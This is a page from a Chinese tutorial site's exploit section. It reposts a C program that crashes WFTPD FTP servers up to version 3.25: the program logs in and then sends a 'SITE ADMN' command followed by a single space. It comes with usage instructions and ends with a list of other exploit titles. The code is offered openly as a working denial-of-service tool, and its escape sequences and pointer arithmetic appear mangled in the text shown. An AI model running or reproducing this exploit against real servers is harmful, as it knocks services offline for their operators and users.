手机
当前位置:查字典教程网 >网络安全 >Exploit >WFTPD Pro Server
WFTPD Pro Server
摘要:/*********************************************************************...

/************************************************************************

*WFTPD server <= 3.25 SITE ADMN DoS *

* *

*Sending command SITE ADMN 32 makes server BOOM *

* *

*usage: wftpd_dos.exe ip port user pass *

* *

*Coded by Marsu <Marsupilamipowa@hotmail.fr> *

************************************************************************/ #include "winsock2.h"

#include "stdio.h"

#include "stdlib.h"

#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[])

{

struct hostent *he;

struct sockaddr_in sock_addr;

WSADATA wsa;

int ftpsock;

char recvbuff[1024];

char evilbuff[100];

int buflen=100; if (argc!=5)

{

printf("[ ] Usage: %s <ip> <port> <user> <pass>n",argv[0]);

return 1;

}

WSACleanup();

WSAStartup(MAKEWORD(2,0),&wsa); printf("[ ] Connecting to %s:%s ... ",argv[1],argv[2]);

if ((he=gethostbyname(argv[1])) == NULL) {

printf("Failedn[-] Could not init gethostbynamen");

return 1;

}

if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {

printf("Failedn[-] Socket errorn");

return 1;

} sock_addr.sin_family = PF_INET;

sock_addr.sin_port = htons(atoi(argv[2]));

sock_addr.sin_addr = *((struct in_addr *)he->h_addr);

memset(&(sock_addr.sin_zero), '', 8);

if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {

printf("Failedn[-] Sorry, cannot connect to %s:%s. Error: %in", argv[1],argv[2],WSAGetLastError());

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"USER ",5);

memcpy(evilbuff 5,argv[3],strlen(argv[3]));

memcpy(evilbuff 5 strlen(argv[3]),"rn",3);

printf("[ ] Sending USER ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"PASS ",5);

memcpy(evilbuff 5,argv[4],strlen(argv[4]));

memcpy(evilbuff 5 strlen(argv[4]),"rn",3); printf("[ ] Sending PASS ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"SITE ADMN ",10);

memset(evilbuff 10,32,1); //this char is powerfull :p

memcpy(evilbuff 10 1,"rn",3); printf("[ ] Sending SITE ADMN ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn"); printf("[ ] Host should be downn");

return 0;

}

//http://www.leftworld.net

【WFTPD Pro Server】相关文章:

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

DESlock

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

PPMate PPMedia Class ActiveX Control Buffer Overflow PoC

精品推荐
分类导航